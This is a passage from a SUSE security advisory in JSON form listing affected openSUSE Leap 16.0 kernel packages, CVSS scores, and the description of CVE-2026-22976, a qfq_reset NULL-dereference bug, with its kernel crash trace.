"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
